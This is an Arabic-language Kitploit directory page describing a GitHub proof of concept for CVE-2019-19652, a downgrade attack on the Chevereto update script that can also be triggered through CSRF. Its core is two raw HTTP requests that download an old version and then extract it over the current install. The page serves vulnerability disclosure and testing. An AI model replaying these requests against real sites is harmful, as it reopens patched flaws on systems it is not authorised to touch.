Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-19652 — هجوم تخفيض الإصدار Chevereto - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core | Kitploit
أدوات/GitHubGitHub/jra89/cve-2019-19652
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقسوء التكوين
GitHubjra89/cve-2019-19652

CVE-2019-19652

هجوم تخفيض الإصدار Chevereto - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core

عرض المستودع
1منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-19652

هجوم تخفيض الإصدار في Chevereto - الإصدارات المجانية 1.0.0 - 1.1.4، والنواة <= 3.13.5. يمكن لمستخدم بصلاحيات المدير أن يوجّه سكربت التحديث لتخفيض الإصدار بدلاً من ترقيته، مما يعيد إدخال الثغرات السابقة. ونظراً لغياب رمز CSRF، يمكن أيضاً استغلال هذا الهجوم ضمن هجوم CSRF، أي أنه يمكن خداع مستخدم بصلاحيات المدير لتنفيذ هذا الإجراء.

يمكن لمستخدم بصلاحيات المدير أن يأمر سكربت التحديث بتنزيل أي إصدار، حتى الإصدارات القديمة

سيُرجع الخادم اسم الملف الكامل للملف الذي تم تنزيله، والذي سيُستخدم بعد ذلك في الطلب التالي

root@kitploit:~
GET /update/?action=download&version=3.13.4 HTTP/1.1
Host: 192.168.0.88
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.0.88/dashboard/settings/external-services
Cookie: PHPSESSID=47s523u1s4m67g0vaheldg4s31; KEEP_LOGIN=I8G%3A65983a8df3bcb482e2571a6e771c89600221f615208d39aee8bf6663b88aef732c7783e202410a7ae4c3ad2205c96baeddb841b912325b359ec79528638807efbff73a017c6d719aa0cab0d6a5814d98a671c17d457479371228c590e215f7e8bc7bfcb820142106%3A1575658473
Upgrade-Insecure-Requests: 1

ثم استخراجه ببساطة فوق الإصدار الحالي، مما قد يجعله عرضة للثغرات القديمة

root@kitploit:~
GET /update/?action=extract&file=chevereto_3.13.4_3e50e6fa70915cd22849819f.zip HTTP/1.1
Host: 192.168.0.88
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.0.88/dashboard/settings/external-services
Cookie: PHPSESSID=47s523u1s4m67g0vaheldg4s31; KEEP_LOGIN=I8G%3A65983a8df3bcb482e2571a6e771c89600221f615208d39aee8bf6663b88aef732c7783e202410a7ae4c3ad2205c96baeddb841b912325b359ec79528638807efbff73a017c6d719aa0cab0d6a5814d98a671c17d457479371228c590e215f7e8bc7bfcb820142106%3A1575658473
Upgrade-Insecure-Requests: 1
تنزيل الأداة